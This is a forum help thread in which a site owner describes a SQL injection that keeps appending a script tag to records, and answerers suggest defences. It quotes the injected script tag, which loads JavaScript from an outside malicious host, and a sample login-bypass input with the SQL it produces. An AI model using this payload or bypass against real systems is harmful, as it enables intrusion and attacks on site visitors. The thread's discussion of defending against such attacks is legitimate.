SQL Injection

I am having a problem with my database, somehow somone is altering the data in my database, i talked to the IT staff and they say it might be an SQL injection. It alters all the records in one table adding some junk code, like:

so if the value before was 'aleks', after the injection it is 'aleks<script src=http://www.bnrupdate.mobi/b.js></script>'

Have you seen this before ?  Sometimes its code from google analytics, etc.  It is driving me crazy not to mention a security risk.  how can I track down when and who is doing this and how to prevent this from happening again ?

This is a web application with limited users, everything (web forms, etc) is behind a username/password protected area. nothing is open to the public. I am using MS SQL 2000.

Any pointers are appreciated, this is a big concern for me at this moment. And I am willing to pretty much try everything that could help. But if there is a way to get the person doing this i am willing to setup a 'trap' to get his IP or whatever.

Aleks
LVL 1
AleksAsked:
Who is Participating?
 
sureshchsahuCommented:
The below article gives you a clear picture how to prevent from SQL Injection

http://www.codeproject.com/KB/database/SqlInjectionAttacks.aspx
0
 
AleksAuthor Commented:
Ok, so if we talk about not allowing certain charachters to be inputed into the system the aphostrophe '  would be at the top of the list, because the queries that are run require such character. correct ?
Any other character that would be a big no no ?
0
 
madunixCommented:
FYI, sql injection is top rated web Application attack these days. There are many insecure code over the net and also there are several ways to protect ASP.NET application from sql injection attacks. sql injection can occur when an application uses input to construct dynamic sql statements or when it uses stored procedures to connect to the database. Methods of sql injection exploitation are classified according to the DBMS type and exploitation conditions  Vulnerable request can implement Insert, update, delete. It is possible to inject sql code into any part of sql request Blind sql injection Features of sql implementations used in various dbms. Successful sql injection attacks enable attackers to execute commands in an application's database and also take over the server. check google more how to protect against sql injection
regarding Microsoft issue check http://msdn.microsoft.com/en-us/library/ms998271.aspx
search http://www.sans.org/  "sql injection"
WASC: http://projects.webappsec.org/SQL-Injection
OWASP: http://www.owasp.org/index.php/SQL_Injection

madunix

0
Free Tool: Site Down Detector

Helpful to verify reports of your own downtime, or to double check a downed website you are trying to access.

One of a set of tools we are providing to everyone as a way of saying thank you for being a part of the community.

 
R_HarrisonCommented:
Also check out the below article (shameless self promotion) - however XSS is now far more popular then SQL injection and the attack you have received uses SQL Injection to perform an XSS type attack.

http://www.experts-exchange.com/articles/Internet/Web_Development/Preventing-Cross-Site-Scripting-XSS-1.html?sfQueryTermInfo=1+30+xss
0
 
sybeCommented:
> nothing is open to the public

You mean there is not even a "public" part, viewable to non-logged users? If so, it looks you have an easily hacked login form.

Preventing SQL Injection is simple by making sure that all apostrophs in an SQL statement are escaped before sending them to the database.

<%
Replace(userinput, "'", "''")
%>

Hacking a login form when there is no check for SQL Injection is easy by inserting something like "x' OR 'a' = 'a" (without the double quotes) into the password field.

It results in an SQL statement as

SELECT * FROM <users> WHERE <name>='loginname' AND password='x' OR 'a' = 'a'

Because 'a' = 'a' is True for all records, this query will return all users.





0
 
Anthony PerkinsCommented:
>>nothing is open to the public. I am using MS SQL 2000. <<
So MS SQL Server is behind a good firewall?

0
 
AleksAuthor Commented:
So, for them to do this do they need to type ' (quotes) in the password field ?

If I don't allow such character in ANY field in my entire system, would this prevent future injections ?
0
 
sybeCommented:
Not allowing the apostroph has some disadvantages, because it is a character that has its use.
Better escape the apostroph then disallow the apostroph (in terms of code that makes no difference).
0
 
AleksAuthor Commented:
What do you mean 'escape'   ?
0
 
R_HarrisonCommented:
Basically replace a single apostrophe with 2 apostrophies...

e.g  replace(username, "'", "''")

so your sql line might look something like...

SELECT * FROM mytable WHERE Username='" & replace(request("Username"), "'", "''") & "'
0
 
AleksAuthor Commented:
Ok, let me get this straight.
1. I am being attacked by someone entering code in the fields where for example username or password should be?
2. If I dont allow apostrophe or replace it in either field they should no longer be able to enter the code to attack me. Correct ?
0
 
sybeCommented:
1. It is not sure how you are being attacked, but it is possible that it happens this way.
2. SQL-injection can be prevented in a number of ways. Most used are parameterized queries, stored procedures or escaping (indeed  replace every sinmgle apostroph from user-input with two apostrophs) are the most used method. Disallowing apostrophs as user input is not a widely used method.
0
 
Daniel WilsonCommented:
>> Disallowing apostrophs as user input is not a widely used method.

Right.  Mr. O'Brian strongly disapproves of such an approach :)

I highly encourage parameterized queries.  Others like escaping ... and some say to do both.
0
 
AleksAuthor Commented:
This is the query for my login page, which is the only form outside of the password protected area.

<%
var EmployeeLogin__usxusername = "%";
if (String(Request.Form("txtusername")) != "undefined" && 
    String(Request.Form("txtusername")) != "") {
  EmployeeLogin__usxusername = String(Request.Form("txtusername"));
}
%>
<%
var EmployeeLogin__usxpassword = "%";
if (String(Request.Form("txtpassword")) != "undefined" && 
    String(Request.Form("txtpassword")) != "") {
  EmployeeLogin__usxpassword = String(Request.Form("txtpassword"));
}
%>
<%
var EmployeeLogin = Server.CreateObject("ADODB.Recordset");
EmployeeLogin.ActiveConnection = MM_AAA_STRING;
EmployeeLogin.Source = "select * from dbo.vulogdtls   WHERE Loginid = '"+ EmployeeLogin__usxusername.replace(/'/g, "''") + "' AND Password = '"+ EmployeeLogin__usxpassword.replace(/'/g, "''") + "'  AND Enable = 1 AND (ExpDate >= getdate() OR ExpDate IS NULL)";
EmployeeLogin.CursorType = 0;
EmployeeLogin.CursorLocation = 2;
EmployeeLogin.LockType = 1;
EmployeeLogin.Open();
var EmployeeLogin_numRows = 0;
%>

Would that query have any problem and be potentially unsafe ?   Or is it OK. !

I can't seem to find anythign that is causing data to be inputed into my database, this is really becoming a very stressful experience.
Are there any specific recommendations that anyone can make ?  I know reading articles helps but wont be something that will immediately and possibly stop the attacks. For example: Change your IP would be a good recommendation.
I heard that from someone, do you think this would help ?
Are there other specific recommendations you could offer to help prevent attacks ?

How about if its not from the outside but a file or script already in the server, is this a possibility ?   or content in the database that resides there and adds the data .. is this another possibility ?

A
0
 
AleksAuthor Commented:
Also, is there a possibility this is not an sql injection and instead some malicious script already residing in the server ?  if this is the case, what would be the best course of action ?
Or is there a chance the script is inside the database ?
0
 
madunixCommented:
my recommendation:
- Basically, make sure your web server is up-to-date with latest security fixes/patches.
- Make sure you have filter every user input and output as proper encoding like UTF-8.
Read the full testing guide: https://www.owasp.org/images/8/89/OWASP_Testing_Guide_V3.pdf
- try tom imlement web application scanner , check this link http://trac.ush.it/ush/wiki/SecurityTools
- i use ex. watchfile now IBM aapscan tools http://www-01.ibm.com/software/rational/offerings/websecurity/  to scan all my web application
0
 
AleksAuthor Commented:
Thank you, this is very useful. I will look into this tools.

Aleks
0
 
AleksAuthor Commented:
I am sorry its taken long for me to respond but I have been busy learning and implementing the sql fixes.
The thing is last night i stopped my website from IIS. no web access. I cleaned up my database skeeque clean ... midnight ... went to sleep. Woke up and checked my database .. all injected, same code all over different tables (Same tables) and mostly on 'text' fields.
So .. how could someone inject information into my database while the website is down, my understanding is that they do it through the web pages by entering code and submitting the form to run it, if there is no form how in the world did my database got this code ?

I checked for viruses and adware/malware ... nothing in the server. It is sql 2000 with service pack 4 and all patched up to the neck .. dont know what else to do.

My DB person told me to run profiler on the sql so we can see what happens overnight.  Any other ideas ?  it would sound like a worm that is in the database, but then again i know nothing about this things, i am losing my faith and my whole business depends on this database :(
0
 
AleksAuthor Commented:
BTW. I already changed all server passwords, database passwords, ODBC passwords, I assigned a new IP, a new domain name ... and still got the code inserted into my database, all while the website that connects to the database was down.
0
 
kevp75Commented:
better still would be to use parameterized queiries with ado.command object.

force all the data types before they get to your query

also, start cleaning your input...  I suggest some regular expressions to validate everything
0
 
Anthony PerkinsCommented:
>>better still would be to use parameterized queiries <<
Very good advice.  :)
0
Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

All Courses

From novice to tech pro — start learning today.